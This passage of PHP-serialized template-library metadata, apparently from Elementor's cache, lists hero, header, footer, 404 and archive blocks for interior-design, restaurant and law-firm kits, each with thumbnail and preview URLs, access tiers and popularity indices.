9\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.8.jpg\";s:12:\"tmpl_created\";i:1524583598;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:379;s:16:\"popularity_index\";i:102;s:11:\"trend_index\";i:78;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:613;a:21:{s:4:\"tmpl\";i:572;s:2:\"id\";i:6266;s:5:\"title\";s:6:\"Hero 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_4.png\";s:12:\"tmpl_created\";i:1520443695;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:380;s:16:\"popularity_index\";i:52;s:11:\"trend_index\";i:35;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:614;a:21:{s:4:\"tmpl\";i:528;s:2:\"id\";i:5783;s:5:\"title\";s:7:\"Hero 10\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_2.png\";s:12:\"tmpl_created\";i:1520443586;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/hero-10/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:383;s:16:\"popularity_index\";i:365;s:11:\"trend_index\";i:567;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:615;a:21:{s:4:\"tmpl\";i:527;s:2:\"id\";i:5773;s:5:\"title\";s:7:\"Hero 11\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_1.png\";s:12:\"tmpl_created\";i:1520443584;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/hero-11/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:384;s:16:\"popularity_index\";i:39;s:11:\"trend_index\";i:179;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:616;a:21:{s:4:\"tmpl\";i:479;s:2:\"id\";i:5238;s:5:\"title\";s:7:\"Hero 12\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_white_4.png\";s:12:\"tmpl_created\";i:1520443468;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/hero-12/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:386;s:16:\"popularity_index\";i:611;s:11:\"trend_index\";i:555;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:617;a:21:{s:4:\"tmpl\";i:573;s:2:\"id\";i:6274;s:5:\"title\";s:6:\"Hero 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_5.png\";s:12:\"tmpl_created\";i:1520443698;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:389;s:16:\"popularity_index\";i:87;s:11:\"trend_index\";i:88;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:618;a:21:{s:4:\"tmpl\";i:569;s:2:\"id\";i:6239;s:5:\"title\";s:6:\"Hero 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_1.png\";s:12:\"tmpl_created\";i:1520443689;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:391;s:16:\"popularity_index\";i:23;s:11:\"trend_index\";i:34;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:619;a:21:{s:4:\"tmpl\";i:571;s:2:\"id\";i:6258;s:5:\"title\";s:6:\"Hero 4\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_3.png\";s:12:\"tmpl_created\";i:1520443693;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:393;s:16:\"popularity_index\";i:479;s:11:\"trend_index\";i:470;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:620;a:21:{s:4:\"tmpl\";i:570;s:2:\"id\";i:6249;s:5:\"title\";s:6:\"Hero 5\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_2.png\";s:12:\"tmpl_created\";i:1520443691;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:395;s:16:\"popularity_index\";i:56;s:11:\"trend_index\";i:85;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:621;a:21:{s:4:\"tmpl\";i:568;s:2:\"id\";i:6230;s:5:\"title\";s:6:\"Hero 6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_white_1.png\";s:12:\"tmpl_created\";i:1520443687;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:396;s:16:\"popularity_index\";i:406;s:11:\"trend_index\";i:542;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:622;a:21:{s:4:\"tmpl\";i:530;s:2:\"id\";i:5801;s:5:\"title\";s:6:\"Hero 7\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_4.png\";s:12:\"tmpl_created\";i:1520443589;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:398;s:16:\"popularity_index\";i:15;s:11:\"trend_index\";i:37;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:623;a:21:{s:4:\"tmpl\";i:531;s:2:\"id\";i:5811;s:5:\"title\";s:6:\"Hero 8\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_5.png\";s:12:\"tmpl_created\";i:1520443591;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:400;s:16:\"popularity_index\";i:105;s:11:\"trend_index\";i:86;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:624;a:21:{s:4:\"tmpl\";i:529;s:2:\"id\";i:5792;s:5:\"title\";s:6:\"Hero 9\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_3.png\";s:12:\"tmpl_created\";i:1520443588;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:403;s:16:\"popularity_index\";i:225;s:11:\"trend_index\";i:244;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:625;a:21:{s:4:\"tmpl\";i:978;s:2:\"id\";i:13251;s:5:\"title\";s:27:\"Interior Design – 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/04/404.png\";s:12:\"tmpl_created\";i:1586148737;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/interior-design-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:405;s:16:\"popularity_index\";i:730;s:11:\"trend_index\";i:795;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:626;a:21:{s:4:\"tmpl\";i:979;s:2:\"id\";i:13244;s:5:\"title\";s:30:\"Interior Design – Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/04/Footer.png\";s:12:\"tmpl_created\";i:1586148742;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/interior-design-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:39:\"[\"Business\",\"Footer\",\"Interior Design\"]\";s:10:\"menu_order\";i:406;s:16:\"popularity_index\";i:322;s:11:\"trend_index\";i:178;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:627;a:21:{s:4:\"tmpl\";i:980;s:2:\"id\";i:13236;s:5:\"title\";s:30:\"Interior Design – Header\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-interior-design.png\";s:12:\"tmpl_created\";i:1586148746;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/interior-design-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:39:\"[\"Business\",\"Header\",\"Interior Design\"]\";s:10:\"menu_order\";i:408;s:16:\"popularity_index\";i:146;s:11:\"trend_index\";i:64;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:628;a:21:{s:4:\"tmpl\";i:977;s:2:\"id\";i:13259;s:5:\"title\";s:36:\"Interior Design – News Archive\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/04/Archiv-Blog.png\";s:12:\"tmpl_created\";i:1586148733;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/blocks/interior-design-news-archive/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:410;s:16:\"popularity_index\";i:436;s:11:\"trend_index\";i:132;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:629;a:21:{s:4:\"tmpl\";i:976;s:2:\"id\";i:13267;s:5:\"title\";s:35:\"Interior Design – Single News\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/04/Post.png\";s:12:\"tmpl_created\";i:1586148728;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/blocks/interior-design-single-news/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:413;s:16:\"popularity_index\";i:402;s:11:\"trend_index\";i:108;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:630;a:21:{s:4:\"tmpl\";i:975;s:2:\"id\";i:13274;s:5:\"title\";s:38:\"Interior Design – Single Project\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/04/Single-Project-.png\";s:12:\"tmpl_created\";i:1586148723;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/blocks/interior-design-single-project/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:414;s:16:\"popularity_index\";i:601;s:11:\"trend_index\";i:324;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:631;a:21:{s:4:\"tmpl\";i:1011;s:2:\"id\";i:14058;s:5:\"title\";s:36:\"Japanese restaurant – 404 page\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/06/404-Page.jpg\";s:12:\"tmpl_created\";i:1592290211;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/blocks/japanese-restaurant-404-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:38:\"[\"404\",\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:416;s:16:\"popularity_index\";i:724;s:11:\"trend_index\";i:647;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:632;a:21:{s:4:\"tmpl\";i:1012;s:2:\"id\";i:14050;s:5:\"title\";s:34:\"Japanese restaurant – Footer\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/06/Footer-Small.jpg\";s:12:\"tmpl_created\";i:1592290247;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/blocks/japanese-restaurant-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:41:\"[\"Food\",\"Footer\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:419;s:16:\"popularity_index\";i:317;s:11:\"trend_index\";i:238;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:633;a:21:{s:4:\"tmpl\";i:1013;s:2:\"id\";i:14042;s:5:\"title\";s:34:\"Japanese Restaurant – Header\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2020/06/japanese-restaurant-header.jpg\";s:12:\"tmpl_created\";i:1592290277;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/blocks/japanese-restaurant-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:41:\"[\"Food\",\"Header\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:421;s:16:\"popularity_index\";i:411;s:11:\"trend_index\";i:274;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:634;a:21:{s:4:\"tmpl\";i:914;s:2:\"id\";i:12164;s:5:\"title\";s:20:\"Law Firm – 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2019/11/404.png\";s:12:\"tmpl_created\";i:1572846979;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/blocks/law-firm-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:24:\"[\"404\",\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:422;s:16:\"popularity_index\";i:704;s:11:\"trend_index\";i:716;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:635;a:21:{s:4:\"tmpl\";i:913;s:2:\"id\";i:12170;s:5:\"title\";s:23:\"Law Firm – Archiv\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2019/11/archiv.png\";s:12:\"tmpl_created\";i:1572846967;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/law-firm-archiv/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:424;s:16:\"popularity_index\";i:431;s:11:\"trend_index\";i:294;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:636;a:21:{s:4:\"tmpl\";i:912;s:2:\"id\";i:12179;s:5:\"title\";s:23:\"Law Firm – Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2019/11/footer.png\";s:12:\"tmpl_created\";i:1572846958;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/law-firm-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:27:\"[\"Footer\",\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:425;s:16:\"popularity_index\";i:388;s:11:\"trend_index\";i:240;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:637;a:21:{s:4:\"tmpl\";i:911;s:2:\"id\";i:12194;s:5:\"title\";s:23:\"Law Firm – Header\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-law-firm.png\";s:12:\"tmpl_created\";i:1572846935;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/law-firm-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:27:\"[\"Header\",\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:427;s:16:\"popularity_index\";i:80;s:11:\"trend_index\";i:39;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:638;a:21:{s:4:\"tmpl\";i:910;s:2:\"id\";i:12203;s:5:\"title\";s:30:\"Law Firm – Search Archiv\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/11/search_result.png\";s:12:\"tmpl_created\";i:1572846925;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/law-firm-search-archiv/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:430;s:16:\"popularity_index\";i:493;s:11:\"trend_index\";i:433;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:639;a:21:{s:4:\"tmpl\";i:909;s:2:\"id\";i:12212;s:5:\"title\";s:28:\"Law Firm – Single Post\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2019/11/single.png\";s:12:\"tmpl_created\";i:1572846914;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/blocks/law-firm-single-post/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:432;s:16:\"popularity_index\";i:326;s:11:\"trend_index\";i:214;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:640;a:21:{s:4:\"tmpl\";i:1022;s:2:\"id\";i:14772;s:5:\"title\";s:35:\"Luxury Real Estate – 404 